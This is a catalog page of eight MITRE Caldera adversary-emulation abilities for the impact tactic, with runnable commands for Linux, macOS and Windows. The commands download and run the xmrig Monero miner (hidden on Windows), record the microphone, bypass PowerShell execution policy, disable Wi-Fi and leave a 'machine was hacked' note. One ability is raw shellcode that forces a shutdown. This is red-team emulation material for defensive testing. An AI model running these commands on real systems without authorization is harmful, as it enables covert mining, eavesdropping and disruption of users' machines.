Caldera emulation abilities
8 runnable adversary-emulation actions · command + platform · mapped to ATT&CK
All tactics
build-capabilities · 1 collection · 16 command-and-control · 6 credential-access · 10 defense-evasion · 15 detection · 8 discovery · 67 execution · 9 exfiltration · 13 hunt · 4 impact · 8 lateral-movement · 10 persistence · 3 privilege-escalation · 8 response · 14 setup · 10 technical-information-gathering · 1 training · 6 verification · 2
⚠
Abilities
8 shown of 8Crypto (Monero) Mining
Download and execute Monero miner (xmrig) for 1 minute
Show command
[{"platform": "linux", "executor": "sh", "command": "wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;\ntar -xf xmrig-6.11.2-linux-x64.tar.gz;\ntimeout 60 ./xmrig-6.11.2/xmrig;\n[ $? -eq 124 ]\n"}, {"platform": "darwin", "executor": "sh", "command": "curl -OL https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-macos-x64.tar.gz;\ntar -xf xmrig-6.11.2-macos-x64.tar.gz;\nscreen -S miner -dm ./xmrig-6.11.2/xmrig;\nsleep 60s;\nkillall xmrig;\nscreen -S miner -X quit\n"}, {"platform": "windows", "executor": "psh", "command": "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-msvc-win64.zip -OutFile xmrig-6.11.2-msvc-win64.zip;\nExpand-Archive -LiteralPath xmrig-6.11.2-msvc-win64.zip -DestinationPath .\\;\nStart-Process \".\\xmrig-6.11.2\\xmrig.exe\" -WindowStyle Hidden;\nStart-Sleep -Seconds 60;\nStop-Process -Name \"xmrig\"\n"}]Disrupt WIFI
Turn a computers WIFI off
Show command
[{"platform": "darwin", "executor": "sh", "command": "./wifi.sh off\n"}, {"platform": "linux", "executor": "sh", "command": "./wifi.sh off\n"}, {"platform": "windows", "executor": "psh", "command": ".\\wifi.ps1 -Off\n"}]File Hunter Mission
Hunts for files of a certain extension and inserts a message
Show command
[{"platform": "darwin", "executor": "sh", "command": "./mission.go -duration 60 -extension .caldera -dir '/'"}, {"platform": "linux", "executor": "sh", "command": "./mission.go -duration 60 -extension .caldera -dir '/'"}, {"platform": "windows", "executor": "cmd", "command": "copy mission.go mission.exe &&mission.exe -duration 60 -extension .caldera -dir C:\\"}, {"platform": "windows", "executor": "psh", "command": "mv mission.go mission.exe;.\\mission.exe -duration 60 -extension .caldera -dir 'C:\\';"}]Invoke-MemeKatz
Downloads random meme and sets as desktop background
Show command
[{"platform": "windows", "executor": "psh,pwsh", "command": ".\\Invoke-MemeKatz.ps1\n"}, {"platform": "windows", "executor": "cmd", "command": "powershell.exe -ep bypass -c \"Invoke-MemeKatz.ps1\"\n"}]Leave note
Create a text file for the user to find
Show command
[{"platform": "darwin", "executor": "sh", "command": "echo \"proof that this machine was hacked.\" > message.txt\n"}, {"platform": "linux", "executor": "sh", "command": "echo \"proof that this machine was hacked.\" > message.txt\n"}, {"platform": "windows", "executor": "psh", "command": "Set-Content -Path 'message.txt' -Value 'proof that this machine was hacked.'\n"}]Quit Outlook
Quit Outlook
Show command
[{"platform": "darwin", "executor": "osa", "command": "quit app \"Microsoft Outlook.app\""}]Record microphone
Install sox and record microphone for n-seconds
Show command
[{"platform": "darwin", "executor": "sh", "command": "brew install sox >/dev/null 2>&1;\nsox -d recording.wav trim 0 15 >/dev/null 2>&1;\n"}]Shutdown Target System
Force shutdown a target system using Process Injection and raw shellcode
Show command
[{"platform": "linux", "executor": "shellcode_amd64,shellcode_386", "command": "0x48, 0x31, 0xc0, 0x48, 0x31, 0xd2, 0x50, 0x6a, 0x77, 0x66, 0x68, 0x6e, 0x6f, 0x48, 0x89, 0xe3, 0x50, 0x66, 0x68, 0x2d, 0x68, 0x48, 0x89, 0xe1, 0x50, 0x49, 0xb8, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x49, 0xba, 0x73, 0x68, 0x75, 0x74, 0x64, 0x6f, 0x77, 0x6e, 0x41, 0x52, 0x41, 0x50, 0x48, 0x89, 0xe7, 0x52, 0x53, 0x51, 0x57, 0x48, 0x89, 0xe6, 0x48, 0x83, 0xc0, 0x3b, 0x0f, 0x05\n"}]Showing 1-8 of 8